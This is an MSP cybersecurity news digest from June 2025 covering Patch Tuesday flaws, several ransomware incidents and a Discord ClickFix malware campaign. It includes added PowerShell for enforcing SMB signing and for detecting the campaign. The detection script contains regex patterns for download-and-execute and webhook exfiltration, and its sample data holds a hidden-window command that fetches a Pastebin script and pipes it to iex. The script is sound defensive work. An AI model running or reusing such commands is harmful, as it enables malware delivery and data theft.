MSP cybersecurity news digest, June 18, 2025

Zero-day flaw and 66 vulnerabilities addressed in Microsoft’s June 2025 Patch Tuesday

Microsoft’s June 2025 Patch Tuesday addresses 66 vulnerabilities, including one actively exploited zero-day and one publicly disclosed flaw. Ten of these are classified as "Critical" — mainly remote code execution issues, with others related to privilege escalation.

The zero-day, CVE-2025-33053, involves a WebDAV remote code execution flaw exploited by the APT group “Stealth Falcon.” This bug could allow attackers to run arbitrary code if a user clicks a malicious WebDAV link. Another notable flaw, CVE-2025-33073, is an SMB client privilege escalation vulnerability that could grant SYSTEM access via crafted scripts and was discovered by multiple researchers.

Microsoft has released patches for both, urging users to apply updates promptly, though the SMB flaw can also be mitigated via server-side SMB signing. These updates do not include fixes for Microsoft Edge, Power Automate or Mariner, which were addressed earlier this month.
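The server-side SMB signing mitigation mentioned above can be checked and enforced from PowerShell. The following is an added example for this digest, not code from Microsoft or from the advisory; it uses the built-in `Get-SmbServerConfiguration` and `Set-SmbServerConfiguration` cmdlets and must run in an elevated session. The setting that matters is `RequireSecuritySignature`: `EnableSecuritySignature` alone only advertises signing support and still accepts unsigned sessions.

```powershell
# Added example (not from the digest): inspect and enforce server-side SMB signing,
# the mitigation noted for the SMB client privilege escalation flaw.
# Requires an elevated PowerShell session on Windows 8 / Server 2012 or later.

function Get-SmbSigningState {
    # Returns the current LanmanServer signing settings as one object
    $cfg = Get-SmbServerConfiguration
    [pscustomobject]@{
        EnableSecuritySignature  = $cfg.EnableSecuritySignature
        RequireSecuritySignature = $cfg.RequireSecuritySignature
        Enforced                 = [bool]$cfg.RequireSecuritySignature
    }
}

function Enable-SmbServerSigning {
    [CmdletBinding(SupportsShouldProcess)]
    param()
    if ($PSCmdlet.ShouldProcess('LanmanServer', 'Require SMB signing')) {
        # Require, not merely enable: only RequireSecuritySignature rejects unsigned sessions.
        Set-SmbServerConfiguration -EnableSecuritySignature $true `
                                   -RequireSecuritySignature $true -Force
    }
    Get-SmbSigningState
}

# Equivalent Group Policy setting, for fleets managed centrally:
#   Computer Configuration > Windows Settings > Security Settings > Local Policies >
#   Security Options > "Microsoft network server: Digitally sign communications (always)" = Enabled
# which writes RequireSecuritySignature = 1 under
#   HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters

# Show the state before and after enforcement (use -WhatIf to preview only)
Get-SmbSigningState
Enable-SmbServerSigning
```

Run `Enable-SmbServerSigning -WhatIf` first on a test host; requiring signing adds a small amount of CPU overhead per SMB packet and will break sessions from clients that cannot sign, so inventory legacy clients before rolling it out fleet-wide.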

South Korean booking and ticketing platform and Vietnamese energy company suffer ransomware attacks

A ransomware attack on Yes24, one of South Korea’s largest ticketing and online booking platforms, with annual sales of $472 million in 2024, has disrupted the entertainment industry, halting bookings and delaying major events.

The breach has kept Yes24’s services offline for four days, affecting concert sales, e-book access and fan communities. High-profile events involving K-pop acts like Enhypen and Park Bo-gum have been canceled or postponed, while musicals now require printed or emailed proof of purchase. South Korea’s Personal Information Protection Commission has launched an investigation into potential customer data exposure and compliance with privacy laws. Yes24 stated that it has regained control of its admin account and is working to restore full service.

In a separate case, a major Vietnamese energy company with billions in revenue suffered a ransomware attack affecting 1,000 servers, with attackers demanding $2.5 million; as a state enterprise, it had no legal mechanism to pay the ransom. The Ministry of Public Security’s A05 department, working with U.S. law enforcement, secured decryption keys to prevent catastrophic data loss that could have forced contract renegotiations affecting millions of households. Experts warn that Vietnam’s cybersecurity readiness is still low, with most enterprises lacking proper preparedness, backup strategies and periodic system assessments.


Malware campaign hijacks Discord vanity invite link system, directing users to malicious servers

A new malware campaign exploits Discord’s vanity invite link system to hijack expired or deleted links, redirecting users to malicious servers.

Once on the fake server, victims are prompted to verify their identity via a social engineering technique called “ClickFix,” which tricks them into running a malicious PowerShell command. This command downloads a script from Pastebin that retrieves a first-stage downloader, ultimately delivering AsyncRAT and Skuld Stealer to the victim’s machine. AsyncRAT enables remote control of infected systems and uses a technique called “dead drop resolver” to fetch its C2 address from Pastebin, while Skuld targets Discord, browsers, gaming platforms and crypto wallets, stealing sensitive data including wallet seed phrases via injection techniques. The malware also uses tools like ChromeKatz to bypass Chrome’s encryption and exfiltrates stolen data through Discord webhooks, which makes it hard to detect. Some fake DocuSign sites also use fake CAPTCHA checks to secretly copy malicious code to a victim’s clipboard, a tactic known as clipboard poisoning. Executing this code sets up persistence through a GitHub-hosted script and downloads a final ZIP payload that runs a hidden executable.
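The chain described above leaves recognisable traces in process-creation telemetry: a PowerShell launch with a hidden window, a fetch from Pastebin piped into `Invoke-Expression`, or a later call to a Discord webhook. The following detection script is an added example for this digest, not code from the researchers who reported the campaign; the indicator names, the regular expressions and the three sample command lines are all constructed here for illustration. In production the input would be the command-line field of Sysmon Event ID 1 or Security Event ID 4688 records.

```powershell
# Added example (not from the digest): score process command lines against
# the traits of the ClickFix / Discord-webhook chain described above.
# Indicator names and patterns are constructed for this example.

$Indicators = @(
    @{ Name = 'HiddenWindow';    Pattern = '(?i)-w(indowstyle)?\s+hidden' },
    @{ Name = 'PastebinFetch';   Pattern = '(?i)pastebin\.com/raw/' },
    @{ Name = 'DownloadAndExec'; Pattern = '(?i)(iwr|invoke-webrequest|downloadstring)[^|]*\|\s*(iex|invoke-expression)' },
    @{ Name = 'DiscordWebhook';  Pattern = '(?i)discord(app)?\.com/api/webhooks/' },
    @{ Name = 'EncodedCommand';  Pattern = '(?i)-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}' }
)

function Get-ClickFixIndicators {
    # Emits one record per command line that matches at least one indicator.
    # Score = number of distinct indicators hit; treat 2+ as high confidence.
    param([Parameter(Mandatory)][string[]]$CommandLine)
    foreach ($cmd in $CommandLine) {
        $hits = @($Indicators | Where-Object { $cmd -match $_.Pattern } | ForEach-Object Name)
        if ($hits.Count -gt 0) {
            [pscustomobject]@{
                Score       = $hits.Count
                Indicators  = ($hits -join ',')
                CommandLine = $cmd
            }
        }
    }
}

# Constructed sample records, not real telemetry. The Pastebin path and
# webhook ID are placeholders.
$Samples = @(
    'powershell.exe -w hidden -c "iwr https://pastebin.com/raw/PLACEHOLDER | iex"',
    'powershell.exe -NoProfile -Command "Get-ChildItem C:\Users"',
    'powershell.exe -c "Invoke-RestMethod -Uri https://discord.com/api/webhooks/000/PLACEHOLDER -Method Post"'
)

# First sample scores 3 (HiddenWindow, PastebinFetch, DownloadAndExec),
# the benign second sample is dropped, the third scores 1 (DiscordWebhook).
Get-ClickFixIndicators -CommandLine $Samples |
    Sort-Object Score -Descending |
    Format-Table -AutoSize
```

The benign `Get-ChildItem` line is included deliberately: a rule that fires on every PowerShell launch is useless to an MSP SOC, so each indicator is tied to a specific behaviour of the chain rather than to PowerShell itself. Pair the `DiscordWebhook` indicator with an egress proxy rule, since a workstation posting to `discord.com/api/webhooks/` is rarely legitimate in a managed environment.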

Hosting on trusted platforms like GitHub, Bitbucket and Pastebin helps the attackers evade security systems. Discord has disabled the malicious bot and researchers have noted that the campaign has been mainly targeting users in the U.S., Europe and Asia.


Leading grocery distributor UNFI and Canadian airline WestJet victims of cyber incidents

United Natural Foods (UNFI), a leading grocery wholesale distributor in North America, was hit by a cyberattack, prompting the company to take some systems offline. The company employs over 28,000 people and reported $31 billion in revenue in 2024.

The disruption affected its ability to process and deliver orders to over 30,000 customer locations, including major clients like Whole Foods. UNFI activated its incident response plan, implemented containment measures, and began working with external cybersecurity experts to investigate and remediate the issue. Law enforcement has been notified, and temporary workarounds are in place to support customer service continuity. While the nature of the attack and potential data theft remain undisclosed, no ransomware group has claimed responsibility so far.

In a separate case, WestJet, Canada’s second-largest airline, is investigating a cybersecurity incident that affected internal systems and temporarily disrupted access to its website and mobile app. The company has activated internal response teams and is working with law enforcement and Transport Canada to contain the impact and protect sensitive data. While services have been mostly restored and operations remain safe, it is still unclear whether the disruption was caused by a ransomware attack.


Fog ransomware attack hijacks open-source pentesting tools, as well as employee monitoring software Syteca

A Fog ransomware attack in May 2025 targeted a financial institution in Asia and stood out due to its use of legitimate tools not commonly seen in ransomware incidents. The attackers used open-source pentesting tools like GC2, Adaptix and Stowaway, along with Syteca, a legitimate employee monitoring software.

GC2, previously linked to APT41, enabled command execution and data exfiltration through Google or Microsoft services. Stowaway facilitated the deployment of Syteca, likely for keylogging and screen capturing, indicating possible espionage motives. The attackers also used PsExec, SMBExec, FreeFileSync and MEGAsync for lateral movement and data theft, and created a persistent service on the network. Adaptix was deployed for C2 access, and Impacket was likely used to execute the ransomware.

Researchers suggested this attack may have had espionage objectives, with the ransomware possibly acting as a decoy or a secondary monetization tactic.